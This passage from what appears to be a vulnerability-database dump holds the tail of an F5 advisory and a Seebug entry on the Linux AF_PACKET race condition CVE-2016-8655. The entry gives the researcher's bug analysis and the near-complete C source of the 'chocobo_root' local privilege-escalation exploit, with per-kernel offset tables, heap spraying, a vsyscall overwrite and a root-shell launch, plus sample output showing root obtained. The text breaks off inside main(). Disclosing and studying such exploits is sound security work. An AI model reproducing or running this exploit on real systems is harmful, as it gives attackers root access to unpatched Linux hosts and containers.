vulnerable | None | None \nLineRate | 2.x | None | Not applicable | Not vulnerable | None | None \nTraffix SDC | 5.x | None | Not applicable | Not vulnerable | None | None \n4.x | None | Not applicable \n \n1The CVSSv3 score link takes you to a resource outside of AskF5, and it is possible that the document may be removed without our knowledge.\n\n2These products contain the affected code. However, F5 has determined the vulnerability status to be Not vulnerable because the attacker cannot exploit the code in default, standard, or recommended configurations.\n\nNone\n\n * [K51812227: Understanding Security Advisory versioning](<https://support.f5.com/csp/article/K51812227>)\n * [K41942608: Overview of Security Advisory articles](<https://support.f5.com/csp/article/K41942608>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n", "edition": 1, "modified": "2018-11-19T19:06:00", "published": "2018-03-14T22:32:00", "id": "F5:K44309215", "href": "https://support.f5.com/csp/article/K44309215", "title": "Linux kernel vulnerability CVE-2017-1000111", "type": "f5", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "seebug": [{"lastseen": "2017-11-19T12:02:37", "description": "To create AF_PACKET sockets you need CAP_NET_RAW in your network\r\nnamespace, which can be acquired by unprivileged processes on\r\nsystems where unprivileged namespaces are enabled (Ubuntu, Fedora, etc).\r\nIt can be triggered from within containers to compromise the host kernel.\r\nOn Android, processes with gid=3004/AID_NET_RAW are able to create\r\nAF_PACKET sockets (mediaserver) and can trigger the bug.\r\n\r\nI found the bug by reading code paths that have been opened up by 
the\r\nemergence of unprivileged namespaces, something I think should be\r\noff by default in all Linux distributions given its history of\r\nsecurity vulnerabilities.\r\n\r\nThe problem is inside packet_set_ring() and packet_setsockopt().\r\nWe can reach packet_set_ring() by calling setsockopt() on the socket\r\nusing the PACKET_RX_RING option.\r\n\r\nIf the version of the packet socket is TPACKET_V3, a timer_list\r\nobject will be initialized by packet_set_ring() when it calls\r\ninit_prb_bdqc().\r\n```\r\n...\r\n switch (po->tp_version) {\r\n case TPACKET_V3:\r\n /* Transmit path is not supported. We checked\r\n * it above but just being paranoid\r\n */\r\n if (!tx_ring)\r\n init_prb_bdqc(po, rb, pg_vec, req_u);\r\n break;\r\n default:\r\n break;\r\n }\r\n...\r\n```\r\nThe function flow to set up the timer is:\r\npacket_set_ring()->init_prb_bdqc()->prb_setup_retire_blk_timer()->\r\nprb_init_blk_timer()->prb_init_blk_timer()->init_timer()\r\n\r\nWhen the socket is closed, packet_set_ring() is called again\r\nto free the ring buffer and delete the previously initialized\r\ntimer if the packet version is > TPACKET_V2:\r\n\r\n```\r\n...\r\n if (closing && (po->tp_version > TPACKET_V2)) {\r\n /* Because we don't support block-based V3 on tx-ring */\r\n if (!tx_ring)\r\n prb_shutdown_retire_blk_timer(po, rb_queue);\r\n }\r\n...\r\n```\r\n\r\nThe issue is that we can change the packet version to TPACKET_V1\r\nwith packet_setsockopt() after init_prb_bdqc() has been executed\r\nand before packet_set_ring() has returned.\r\n\r\nThere is an attempt to deny changing socket versions after a ring\r\nbuffer has been initialized, but it is insufficient:\r\n```\r\n...\r\n case PACKET_VERSION:\r\n {\r\n...\r\n if (po->rx_ring.pg_vec || po->tx_ring.pg_vec)\r\n return -EBUSY;\r\n...\r\n```\r\nThere's plenty of room to race this code path between the calls to\r\ninit_prb_bdqc() and swap(rb->pg_vec, pg_vec) in packet_set_ring().\r\n\r\nWhen the socket is closed, packet_set_ring() 
will not delete the\r\ntimer since the socket version is now TPACKET_V1. The struct\r\ntimer_list that describes the timer object is located inside the\r\nstruct packet_sock for the socket itself however and will be\r\nfreed with a call to kfree().\r\n\r\nWe then have a use-after-free on a timer object that can be\r\nexploited by various poisoning attacks on the SLAB allocator (I find\r\nadd_key() to be the most reliable). This will ultimately lead to the\r\nkernel jumping to a manipulated function pointer when the timer expires.\r\n\r\nThe bug is fixed by taking lock_sock(sk) in packet_setsockopt() when\r\nchanging the packet version while also taking the lock at the start\r\nof packet_set_ring().\r\n\r\nMy exploit defeats SMEP/SMAP and will give a rootshell on Ubuntu 16.04,\r\nI will hold off a day on publishing it so people have some time to update.\r\n\r\nNew Ubuntu kernels are out so please update as soon as possible.\r\n\r\n=*=*=*=*=*=*=*=*= TIMELINE =*=*=*=*=*=*=*=*=\r\n```\r\n2016-11-28: Bug reported to security () kernel org\r\n2016-11-30: Patch submitted to netdev, notification sent to linux-distros\r\n2016-12-02: Patch committed to mainline kernel\r\n2016-12-06: Public announcement\r\n```", "published": "2016-12-07T00:00:00", "type": "seebug", "title": "Linux af_packet.c race condition (local root) (CVE-2016-8655)", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-8655"], "modified": "2016-12-07T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-92567", "id": "SSV:92567", "sourceData": "\n /*\r\nchocobo_root.c\r\nlinux AF_PACKET race condition exploit\r\nexploit for Ubuntu 16.04 x86_64\r\n \r\nvroom vroom\r\n*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=\r\nuser@ubuntu:~$ uname -a\r\nLinux ubuntu 4.4.0-51-generic #72-Ubuntu SMP Thu Nov 24 18:29:54 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux\r\nuser@ubuntu:~$ id\r\nuid=1000(user) gid=1000(user) groups=1000(user)\r\nuser@ubuntu:~$ gcc chocobo_root.c -o chocobo_root 
-lpthread\r\nuser@ubuntu:~$ ./chocobo_root\r\nlinux AF_PACKET race condition exploit by rebel\r\nkernel version: 4.4.0-51-generic #72\r\nproc_dostring = 0xffffffff81088090\r\nmodprobe_path = 0xffffffff81e48f80\r\nregister_sysctl_table = 0xffffffff812879a0\r\nset_memory_rw = 0xffffffff8106f320\r\nexploit starting\r\nmaking vsyscall page writable..\r\n \r\nnew exploit attempt starting, jumping to 0xffffffff8106f320, arg=0xffffffffff600000\r\nsockets allocated\r\nremoving barrier and spraying..\r\nversion switcher stopping, x = -1 (y = 174222, last val = 2)\r\ncurrent packet version = 0\r\npbd->hdr.bh1.offset_to_first_pkt = 48\r\n*=*=*=* TPACKET_V1 && offset_to_first_pkt != 0, race won *=*=*=*\r\nplease wait up to a few minutes for timer to be executed. if you ctrl-c now the kernel will hang. so don't do that.\r\nclosing socket and verifying.......\r\nvsyscall page altered!\r\n \r\n \r\nstage 1 completed\r\nregistering new sysctl..\r\n \r\nnew exploit attempt starting, jumping to 0xffffffff812879a0, arg=0xffffffffff600850\r\nsockets allocated\r\nremoving barrier and spraying..\r\nversion switcher stopping, x = -1 (y = 30773, last val = 0)\r\ncurrent packet version = 2\r\npbd->hdr.bh1.offset_to_first_pkt = 48\r\nrace not won\r\n \r\nretrying stage..\r\nnew exploit attempt starting, jumping to 0xffffffff812879a0, arg=0xffffffffff600850\r\nsockets allocated\r\nremoving barrier and spraying..\r\nversion switcher stopping, x = -1 (y = 133577, last val = 2)\r\ncurrent packet version = 0\r\npbd->hdr.bh1.offset_to_first_pkt = 48\r\n*=*=*=* TPACKET_V1 && offset_to_first_pkt != 0, race won *=*=*=*\r\nplease wait up to a few minutes for timer to be executed. if you ctrl-c now the kernel will hang. 
so don't do that.\r\nclosing socket and verifying.......\r\nsysctl added!\r\n \r\nstage 2 completed\r\nbinary executed by kernel, launching rootshell\r\nroot@ubuntu:~# id\r\nuid=0(root) gid=0(root) groups=0(root),1000(user)\r\n \r\n*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=\r\n \r\nThere are offsets included for older kernels, but they're untested\r\nso be aware that this exploit will probably crash kernels older than 4.4.\r\n \r\ntested on:\r\nUbuntu 16.04: 4.4.0-51-generic\r\nUbuntu 16.04: 4.4.0-47-generic\r\nUbuntu 16.04: 4.4.0-36-generic\r\nUbuntu 14.04: 4.4.0-47-generic #68~14.04.1-Ubuntu\r\n \r\nShoutouts to:\r\njsc for inspiration (https://www.youtube.com/watch?v=x4UDIfcYMKI)\r\nmcdelivery for delivering hotcakes and coffee\r\n \r\n11/2016\r\nby rebel\r\n*/\r\n \r\n#define _GNU_SOURCE\r\n#include <stdlib.h>\r\n#include <stdio.h>\r\n#include <string.h>\r\n#include <stdint.h>\r\n#include <unistd.h>\r\n#include <sys/wait.h>\r\n#include <assert.h>\r\n#include <errno.h>\r\n#include <fcntl.h>\r\n#include <poll.h>\r\n#include <sys/types.h>\r\n#include <sys/socket.h>\r\n#include <arpa/inet.h>\r\n#include <netinet/if_ether.h>\r\n#include <sys/mman.h>\r\n#include <sys/socket.h>\r\n#include <sys/stat.h>\r\n#include <linux/if_packet.h>\r\n#include <pthread.h>\r\n#include <linux/sched.h>\r\n#include <netinet/tcp.h>\r\n#include <sys/syscall.h>\r\n#include <signal.h>\r\n#include <sched.h>\r\n#include <sys/utsname.h>\r\n \r\nvolatile int barrier = 1;\r\nvolatile int vers_switcher_done = 0;\r\n \r\nstruct offset {\r\n char *kernel_version;\r\n unsigned long proc_dostring;\r\n unsigned long modprobe_path;\r\n unsigned long register_sysctl_table;\r\n unsigned long set_memory_rw;\r\n};\r\n \r\n \r\nstruct offset *off = NULL;\r\n \r\n//99% of these offsets haven't actually been tested :)\r\n \r\nstruct offset offsets[] = {\r\n {\"4.4.0-46-generic #67~14.04.1\",0xffffffff810842f0,0xffffffff81e4b100,0xffffffff81274580,0xffffffff8106b880},\r\n {\"4.4.0-47-generic 
#68~14.04.1\",0,0,0,0},\r\n {\"4.2.0-41-generic #48\",0xffffffff81083470,0xffffffff81e48920,0xffffffff812775c0,0xffffffff8106c680},\r\n {\"4.8.0-22-generic #24\",0xffffffff8108ab70,0xffffffff81e47880,0xffffffff812b34b0,0xffffffff8106f0d0},\r\n {\"4.2.0-34-generic #39\",0xffffffff81082080,0xffffffff81c487e0,0xffffffff81274490,0xffffffff8106b5d0},\r\n {\"4.2.0-30-generic #36\",0xffffffff810820d0,0xffffffff81c487e0,0xffffffff812744e0,0xffffffff8106b620},\r\n {\"4.2.0-16-generic #19\",0xffffffff81081ac0,0xffffffff81c48680,0xffffffff812738f0,0xffffffff8106b110},\r\n {\"4.2.0-17-generic #21\",0,0,0,0},\r\n {\"4.2.0-18-generic #22\",0,0,0,0},\r\n {\"4.2.0-19-generic #23~14.04.1\",0xffffffff8107d640,0xffffffff81c497c0,0xffffffff8125de30,0xffffffff81067750},\r\n {\"4.2.0-21-generic #25~14.04.1\",0,0,0,0},\r\n {\"4.2.0-30-generic #36~14.04.1\",0xffffffff8107da40,0xffffffff81c4a8e0,0xffffffff8125dd40,0xffffffff81067b20},\r\n {\"4.2.0-27-generic #32~14.04.1\",0xffffffff8107dbe0,0xffffffff81c498c0,0xffffffff8125e420,0xffffffff81067c60},\r\n {\"4.2.0-36-generic #42\",0xffffffff81083430,0xffffffff81e488e0,0xffffffff81277380,0xffffffff8106c680},\r\n {\"4.4.0-22-generic #40\",0xffffffff81087d40,0xffffffff81e48f00,0xffffffff812864d0,0xffffffff8106f370},\r\n {\"4.2.0-18-generic #22~14.04.1\",0xffffffff8107d620,0xffffffff81c49780,0xffffffff8125dd10,0xffffffff81067760},\r\n {\"4.4.0-34-generic #53\",0xffffffff81087ea0,0xffffffff81e48f80,0xffffffff81286ed0,0xffffffff8106f370},\r\n {\"4.2.0-22-generic #27\",0xffffffff81081ad0,0xffffffff81c486c0,0xffffffff81273b20,0xffffffff8106b100},\r\n {\"4.2.0-23-generic #28\",0,0,0,0},\r\n {\"4.2.0-25-generic #30\",0,0,0,0},\r\n {\"4.4.0-36-generic #55\",0xffffffff81087ea0,0xffffffff81e48f80,0xffffffff81286e50,0xffffffff8106f360},\r\n {\"4.2.0-42-generic #49\",0xffffffff81083490,0xffffffff81e489a0,0xffffffff81277870,0xffffffff8106c680},\r\n {\"4.4.0-31-generic #50\",0xffffffff81087ea0,0xffffffff81e48f80,0xffffffff81286e90,0xffffffff8106f370},\r\n 
{\"4.4.0-22-generic #40~14.04.1\",0xffffffff81084250,0xffffffff81c4b080,0xffffffff81273de0,0xffffffff8106b9d0},\r\n {\"4.2.0-38-generic #45\",0xffffffff810833d0,0xffffffff81e488e0,0xffffffff81277410,0xffffffff8106c680},\r\n {\"4.4.0-45-generic #66\",0xffffffff81087fc0,0xffffffff81e48f80,0xffffffff812874c0,0xffffffff8106f320},\r\n {\"4.2.0-36-generic #42~14.04.1\",0xffffffff8107ffd0,0xffffffff81c499e0,0xffffffff81261ea0,0xffffffff81069d00},\r\n {\"4.4.0-45-generic #66~14.04.1\",0xffffffff81084260,0xffffffff81e4b100,0xffffffff81274340,0xffffffff8106b880},\r\n {\"4.2.0-22-generic #27~14.04.1\",0xffffffff8107d640,0xffffffff81c497c0,0xffffffff8125deb0,0xffffffff81067750},\r\n {\"4.2.0-25-generic #30~14.04.1\",0,0,0,0},\r\n {\"4.2.0-23-generic #28~14.04.1\",0,0,0,0},\r\n {\"4.4.0-46-generic #67\",0xffffffff81088040,0xffffffff81e48f80,0xffffffff81287800,0xffffffff8106f320},\r\n {\"4.4.0-47-generic #68\",0,0,0,0},\r\n {\"4.4.0-34-generic #53~14.04.1\",0xffffffff81084160,0xffffffff81c4b100,0xffffffff81273c40,0xffffffff8106b880},\r\n {\"4.4.0-36-generic #55~14.04.1\",0xffffffff81084160,0xffffffff81c4b100,0xffffffff81273c60,0xffffffff8106b890},\r\n {\"4.4.0-31-generic #50~14.04.1\",0xffffffff81084160,0xffffffff81c4b100,0xffffffff81273c20,0xffffffff8106b880},\r\n {\"4.2.0-38-generic #45~14.04.1\",0xffffffff8107fdc0,0xffffffff81c4a9e0,0xffffffff81261540,0xffffffff81069bf0},\r\n {\"4.2.0-35-generic #40\",0xffffffff81083430,0xffffffff81e48860,0xffffffff81277240,0xffffffff8106c680},\r\n {\"4.4.0-24-generic #43~14.04.1\",0xffffffff81084120,0xffffffff81c4b080,0xffffffff812736f0,0xffffffff8106b880},\r\n {\"4.4.0-21-generic #37\",0xffffffff81087cf0,0xffffffff81e48e80,0xffffffff81286310,0xffffffff8106f370},\r\n {\"4.2.0-34-generic #39~14.04.1\",0xffffffff8107dc50,0xffffffff81c498e0,0xffffffff8125e830,0xffffffff81067c90},\r\n {\"4.4.0-24-generic #43\",0xffffffff81087e60,0xffffffff81e48f00,0xffffffff812868f0,0xffffffff8106f370},\r\n {\"4.4.0-21-generic 
#37~14.04.1\",0xffffffff81084220,0xffffffff81c4b000,0xffffffff81273a30,0xffffffff8106b9d0},\r\n {\"4.2.0-41-generic #48~14.04.1\",0xffffffff8107fe20,0xffffffff81c4aa20,0xffffffff812616c0,0xffffffff81069bf0},\r\n {\"4.8.0-27-generic #29\",0xffffffff8108ab70,0xffffffff81e47880,0xffffffff812b3490,0xffffffff8106f0d0},\r\n {\"4.8.0-26-generic #28\",0,0,0,0},\r\n {\"4.4.0-38-generic #57\",0xffffffff81087f70,0xffffffff81e48f80,0xffffffff81287470,0xffffffff8106f360},\r\n {\"4.4.0-42-generic #62~14.04.1\",0xffffffff81084260,0xffffffff81e4b100,0xffffffff81274300,0xffffffff8106b880},\r\n {\"4.4.0-38-generic #57~14.04.1\",0xffffffff81084210,0xffffffff81e4b100,0xffffffff812742e0,0xffffffff8106b890},\r\n {\"4.4.0-49-generic #70\",0xffffffff81088090,0xffffffff81e48f80,0xffffffff81287d40,0xffffffff8106f320},\r\n {\"4.4.0-49-generic #70~14.04.1\",0xffffffff81084350,0xffffffff81e4b100,0xffffffff81274b10,0xffffffff8106b880},\r\n {\"4.2.0-21-generic #25\",0xffffffff81081ad0,0xffffffff81c486c0,0xffffffff81273aa0,0xffffffff8106b100},\r\n {\"4.2.0-19-generic #23\",0,0,0,0},\r\n {\"4.2.0-42-generic #49~14.04.1\",0xffffffff8107fe20,0xffffffff81c4aaa0,0xffffffff81261980,0xffffffff81069bf0},\r\n {\"4.4.0-43-generic #63\",0xffffffff81087fc0,0xffffffff81e48f80,0xffffffff812874b0,0xffffffff8106f320},\r\n {\"4.4.0-28-generic #47\",0xffffffff81087ea0,0xffffffff81e48f80,0xffffffff81286df0,0xffffffff8106f370},\r\n {\"4.4.0-28-generic #47~14.04.1\",0xffffffff81084160,0xffffffff81c4b100,0xffffffff81273b70,0xffffffff8106b880},\r\n {\"4.9.0-1-generic #2\",0xffffffff8108bbe0,0xffffffff81e4ac20,0xffffffff812b8400,0xffffffff8106f390},\r\n {\"4.8.0-28-generic #30\",0xffffffff8108ae10,0xffffffff81e48b80,0xffffffff812b3690,0xffffffff8106f0e0},\r\n {\"4.2.0-35-generic #40~14.04.1\",0xffffffff8107fff0,0xffffffff81c49960,0xffffffff81262320,0xffffffff81069d20},\r\n {\"4.2.0-27-generic #32\",0xffffffff810820c0,0xffffffff81c487c0,0xffffffff81274150,0xffffffff8106b620},\r\n {\"4.4.0-42-generic 
#62\",0xffffffff81087fc0,0xffffffff81e48f80,0xffffffff812874a0,0xffffffff8106f320},\r\n {\"4.4.0-51-generic #72\",0xffffffff81088090,0xffffffff81e48f80,0xffffffff812879a0,0xffffffff8106f320},\r\n//{\"4.8.6-300.fc25.x86_64 #1 SMP Tue Nov 1 12:36:38 UTC 2016\",0xffffffff9f0a8b30,0xffffffff9fe40940,0xffffffff9f2cfbf0,0xffffffff9f0663b0},\r\n {NULL,0,0,0,0}\r\n};\r\n \r\n#define VSYSCALL 0xffffffffff600000\r\n \r\n#define PAD 64\r\n \r\nint pad_fds[PAD];\r\n \r\nstruct ctl_table {\r\n const char *procname;\r\n void *data;\r\n int maxlen;\r\n unsigned short mode;\r\n struct ctl_table *child;\r\n void *proc_handler;\r\n void *poll;\r\n void *extra1;\r\n void *extra2;\r\n};\r\n \r\n#define CONF_RING_FRAMES 1\r\n \r\nstruct tpacket_req3 tp;\r\nint sfd;\r\nint mapped = 0;\r\n \r\nstruct timer_list {\r\n void *next;\r\n void *prev;\r\n unsigned long expires;\r\n void (*function)(unsigned long);\r\n unsigned long data;\r\n unsigned int flags;\r\n int slack;\r\n};\r\n \r\nvoid *setsockopt_thread(void *arg)\r\n{\r\n while(barrier) {\r\n }\r\n setsockopt(sfd, SOL_PACKET, PACKET_RX_RING, (void*) &tp, sizeof(tp));\r\n \r\n return NULL;\r\n}\r\n \r\nvoid *vers_switcher(void *arg)\r\n{\r\n int val,x,y;\r\n \r\n while(barrier) {}\r\n \r\n while(1) {\r\n val = TPACKET_V1;\r\n x = setsockopt(sfd, SOL_PACKET, PACKET_VERSION, &val, sizeof(val));\r\n \r\n y++;\r\n \r\n if(x != 0) break;\r\n \r\n val = TPACKET_V3;\r\n x = setsockopt(sfd, SOL_PACKET, PACKET_VERSION, &val, sizeof(val));\r\n \r\n if(x != 0) break;\r\n \r\n y++;\r\n }\r\n \r\n fprintf(stderr,\"version switcher stopping, x = %d (y = %d, last val = %d)\\n\",x,y,val);\r\n vers_switcher_done = 1;\r\n \r\n \r\n return NULL;\r\n}\r\n \r\n#define BUFSIZE 1408\r\nchar exploitbuf[BUFSIZE];\r\n \r\nvoid kmalloc(void)\r\n{\r\n while(1)\r\n syscall(__NR_add_key, \"user\",\"wtf\",exploitbuf,BUFSIZE-24,-2);\r\n}\r\n \r\n \r\nvoid pad_kmalloc(void)\r\n{\r\n int x;\r\n \r\n for(x=0; x<PAD; x++)\r\n 
if(socket(AF_PACKET,SOCK_DGRAM,htons(ETH_P_ARP)) == -1) {\r\n fprintf(stderr,\"pad_kmalloc() socket error\\n\");\r\n exit(1);\r\n }\r\n \r\n}\r\n \r\nint try_exploit(unsigned long func, unsigned long arg, void *verification_func)\r\n{\r\n pthread_t setsockopt_thread_thread,a;\r\n int val;\r\n socklen_t l;\r\n struct timer_list *timer;\r\n int fd;\r\n struct tpacket_block_desc *pbd;\r\n int off;\r\n sigset_t set;\r\n \r\n sigemptyset(&set);\r\n \r\n sigaddset(&set, SIGSEGV);\r\n \r\n if(pthread_sigmask(SIG_BLOCK, &set, NULL) != 0) {\r\n fprintf(stderr,\"couldn't set sigmask\\n\");\r\n exit(1);\r\n }\r\n \r\n fprintf(stderr,\"new exploit attempt starting, jumping to %p, arg=%p\\n\",(void *)func,(void *)arg);\r\n \r\n pad_kmalloc();\r\n \r\n fd=socket(AF_PACKET,SOCK_DGRAM,htons(ETH_P_ARP));\r\n \r\n if (fd==-1) {\r\n printf(\"target socket error\\n\");\r\n exit(1);\r\n }\r\n \r\n pad_kmalloc();\r\n \r\n fprintf(stderr,\"sockets allocated\\n\");\r\n \r\n val = TPACKET_V3;\r\n \r\n setsockopt(fd, SOL_PACKET, PACKET_VERSION, &val, sizeof(val));\r\n \r\n tp.tp_block_size = CONF_RING_FRAMES * getpagesize();\r\n tp.tp_block_nr = 1;\r\n tp.tp_frame_size = getpagesize();\r\n tp.tp_frame_nr = CONF_RING_FRAMES;\r\n \r\n//try to set the timeout to 10 seconds\r\n//the default timeout might still be used though depending on when the race was won\r\n tp.tp_retire_blk_tov = 10000;\r\n \r\n sfd = fd;\r\n \r\n if(pthread_create(&setsockopt_thread_thread, NULL, setsockopt_thread, (void *)NULL)) {\r\n fprintf(stderr, \"Error creating thread\\n\");\r\n return 1;\r\n }\r\n \r\n \r\n pthread_create(&a, NULL, vers_switcher, (void *)NULL);\r\n \r\n usleep(200000);\r\n \r\n fprintf(stderr,\"removing barrier and spraying..\\n\");\r\n \r\n memset(exploitbuf,'\\x00',BUFSIZE);\r\n \r\n timer = (struct timer_list *)(exploitbuf+(0x6c*8)+6-8);\r\n timer->next = 0;\r\n timer->prev = 0;\r\n \r\n timer->expires = 4294943360;\r\n timer->function = (void *)func;\r\n timer->data = arg;\r\n timer->flags = 
1;\r\n timer->slack = -1;\r\n \r\n \r\n barrier = 0;\r\n \r\n usleep(100000);\r\n \r\n while(!vers_switcher_done)usleep(100000);\r\n \r\n l = sizeof(val);\r\n getsockopt(sfd, SOL_PACKET, PACKET_VERSION, &val, &l);\r\n \r\n fprintf(stderr,\"current packet version = %d\\n\",val);\r\n \r\n pbd = mmap(0, tp.tp_block_size * tp.tp_block_nr, PROT_READ | PROT_WRITE, MAP_SHARED, sfd, 0);\r\n \r\n \r\n if(pbd == MAP_FAILED) {\r\n fprintf(stderr,\"could not map pbd\\n\");\r\n exit(1);\r\n }\r\n \r\n else {\r\n off = pbd->hdr.bh1.offset_to_first_pkt;\r\n fprintf(stderr,\"pbd->hdr.bh1.offset_to_first_pkt = %d\\n\",off);\r\n }\r\n \r\n \r\n if(val == TPACKET_V1 && off != 0) {\r\n fprintf(stderr,\"*=*=*=* TPACKET_V1 && offset_to_first_pkt != 0, race won *=*=*=*\\n\");\r\n }\r\n \r\n else {\r\n fprintf(stderr,\"race not won\\n\");\r\n exit(2);\r\n }\r\n \r\n munmap(pbd, tp.tp_block_size * tp.tp_block_nr);\r\n \r\n pthread_create(&a, NULL, verification_func, (void *)NULL);\r\n \r\n fprintf(stderr,\"please wait up to a few minutes for timer to be executed. if you ctrl-c now the kernel will hang. 
so don't do that.\\n\");\r\n sleep(1);\r\n fprintf(stderr,\"closing socket and verifying..\");\r\n \r\n close(sfd);\r\n \r\n kmalloc();\r\n \r\n fprintf(stderr,\"all messages sent\\n\");\r\n \r\n sleep(31337);\r\n exit(1);\r\n}\r\n \r\n \r\nint verification_result = 0;\r\n \r\nvoid catch_sigsegv(int sig)\r\n{\r\n verification_result = 0;\r\n pthread_exit((void *)1);\r\n}\r\n \r\n \r\nvoid *modify_vsyscall(void *arg)\r\n{\r\n unsigned long *vsyscall = (unsigned long *)(VSYSCALL+0x850);\r\n unsigned long x = (unsigned long)arg;\r\n \r\n sigset_t set;\r\n sigemptyset(&set);\r\n sigaddset(&set, SIGSEGV);\r\n \r\n if(pthread_sigmask(SIG_UNBLOCK, &set, NULL) != 0) {\r\n fprintf(stderr,\"couldn't set sigmask\\n\");\r\n exit(1);\r\n }\r\n \r\n signal(SIGSEGV, catch_sigsegv);\r\n \r\n *vsyscall = 0xdeadbeef+x;\r\n \r\n if(*vsyscall == 0xdeadbeef+x) {\r\n fprintf(stderr,\"\\nvsyscall page altered!\\n\");\r\n verification_result = 1;\r\n pthread_exit(0);\r\n }\r\n \r\n return NULL;\r\n}\r\n \r\nvoid verify_stage1(void)\r\n{\r\n int x;\r\n pthread_t v_thread;\r\n \r\n sleep(5);\r\n \r\n for(x=0; x<300; x++) {\r\n \r\n pthread_create(&v_thread, NULL, modify_vsyscall, 0);\r\n \r\n pthread_join(v_thread, NULL);\r\n \r\n if(verification_result == 1) {\r\n exit(0);\r\n }\r\n \r\n write(2,\".\",1);\r\n sleep(1);\r\n }\r\n \r\n printf(\"could not modify vsyscall\\n\");\r\n \r\n exit(1);\r\n}\r\n \r\nvoid verify_stage2(void)\r\n{\r\n int x;\r\n struct stat b;\r\n \r\n sleep(5);\r\n \r\n for(x=0; x<300; x++) {\r\n \r\n if(stat(\"/proc/sys/hack\",&b) == 0) {\r\n fprintf(stderr,\"\\nsysctl added!\\n\");\r\n exit(0);\r\n }\r\n \r\n write(2,\".\",1);\r\n sleep(1);\r\n }\r\n \r\n printf(\"could not add sysctl\\n\");\r\n exit(1);\r\n \r\n \r\n}\r\n \r\nvoid exploit(unsigned long func, unsigned long arg, void *verification_func)\r\n{\r\n int status;\r\n int pid;\r\n \r\nretry:\r\n \r\n pid = fork();\r\n \r\n if(pid == 0) {\r\n try_exploit(func, arg, verification_func);\r\n exit(1);\r\n }\r\n 
\r\n wait(&status);\r\n \r\n printf(\"\\n\");\r\n \r\n if(WEXITSTATUS(status) == 2) {\r\n printf(\"retrying stage..\\n\");\r\n kill(pid, 9);\r\n sleep(2);\r\n goto retry;\r\n }\r\n \r\n else if(WEXITSTATUS(status) != 0) {\r\n printf(\"something bad happened, aborting exploit attempt\\n\");\r\n exit(-1);\r\n }\r\n \r\n \r\n \r\n kill(pid, 9);\r\n}\r\n \r\n \r\nvoid wrapper(void)\r\n{\r\n struct ctl_table *c;\r\n \r\n fprintf(stderr,\"exploit starting\\n\");\r\n printf(\"making vsyscall page writable..\\n\\n\");\r\n \r\n exploit(off->set_memory_rw, VSYSCALL, verify_stage1);\r\n \r\n printf(\"\\nstage 1 completed\\n\");\r\n \r\n sleep(5);\r\n \r\n printf(\"registering new sysctl..\\n\\n\");\r\n \r\n c = (struct ctl_table *)(VSYSCALL+0x850);\r\n \r\n memset((char *)(VSYSCALL+0x850), '\\x00', 1952);\r\n \r\n strcpy((char *)(VSYSCALL+0xf00),\"hack\");\r\n memcpy((char *)(VSYSCALL+0xe00),\"\\x01\\x00\\x00\\x00\",4);\r\n c->procname = (char *)(VSYSCALL+0xf00);\r\n c->mode = 0666;\r\n c->proc_handler = (void *)(off->proc_dostring);\r\n c->data = (void *)(off->modprobe_path);\r\n c->maxlen=256;\r\n c->extra1 = (void *)(VSYSCALL+0xe00);\r\n c->extra2 = (void *)(VSYSCALL+0xd00);\r\n \r\n exploit(off->register_sysctl_table, VSYSCALL+0x850, verify_stage2);\r\n \r\n printf(\"stage 2 completed\\n\");\r\n}\r\n \r\nvoid launch_rootshell(void)\r\n{\r\n int fd;\r\n char buf[256];\r\n struct stat s;\r\n \r\n \r\n fd = open(\"/proc/sys/hack\",O_WRONLY);\r\n \r\n if(fd == -1) {\r\n fprintf(stderr,\"could not open /proc/sys/hack\\n\");\r\n exit(-1);\r\n }\r\n \r\n memset(buf,'\\x00', 256);\r\n \r\n readlink(\"/proc/self/exe\",(char *)&buf,256);\r\n \r\n write(fd,buf,strlen(buf)+1);\r\n \r\n socket(AF_INET,SOCK_STREAM,132);\r\n \r\n if(stat(buf,&s) == 0 && s.st_uid == 0) {\r\n printf(\"binary executed by kernel, launching rootshell\\n\");\r\n lseek(fd, 0, SEEK_SET);\r\n write(fd,\"/sbin/modprobe\",15);\r\n close(fd);\r\n execl(buf,buf,NULL);\r\n }\r\n \r\n else\r\n printf(\"could not 
create rootshell\\n\");\r\n \r\n \r\n}\r\n \r\nint main(int argc, char **argv)\r\n{\r\n int status, pid;\r\n struct utsname u;\r\n int i, crash = 0;\r\n char buf[512], *f;\r\n \r\n \r\n if(argc == 2 && !strcmp(argv[1],\"crash\")) {\r\n crash = 1;\r\n }\r\n \r\n \r\n if(getuid() == 0 && geteuid() == 0 && !crash) {\r\n chown(\"/proc/self/exe\",0,0);\r\n chmod(\"/proc/self/exe\",06755);\r\n exit(-1);\r\n }\r\n \r\n else if(getuid() != 0 && geteuid() == 0 && !crash) {\r\n setresuid(0,0,0);\r\n setresgid(0,0,0);\r\n execl(\"/bin/bash\",\"bash\",\"-p\",NULL);\r\n exit(0);\r\n }\r\n \r\n fprintf(stderr,\"linux AF_PACKET race condition exploit by rebel\\n\");\r\n \r\n uname(&u);\r\n \r\n if((f = strstr(u.version,\"-Ubuntu\")) != NULL) *f = '\\0';\r\n \r\n snprintf(buf,512,\"%s %s\",u.release,u.version);\r\n \r\n printf(\"kernel version: %s\\n\",buf);\r\n \r\n \r\n for(i=0; offsets[i].kernel_version != NULL; i++) {\r\n if(!strcmp(offsets[i].kernel_version,buf)) {\r\n \r\n while(offsets[i].proc_dostring == 0)\r\n i--;\r\n \r\n off = &offsets[i];\r\n break;\r\n }\r\n }\r\n \r\n if(crash) {\r\n off = &offsets[0];\r\n off->set_memory_rw = 0xffffffff41414141;\r\n }\r\n \r\n if(off) {\r\n printf(\"proc_dostring = %p\\n\",(void *)off->proc_dostring);\r\n printf(\"modprobe_path = %p\\n\",(void *)off->modprobe_path);\r\n printf(\"register_sysctl_table = %p\\n\",(void *)off->register_sysctl_table);\r\n printf(\"set_memory_rw = %p\\n\",(void *)off->set_memory_rw);\r\n }\r\n \r\n if(!off) {\r\n 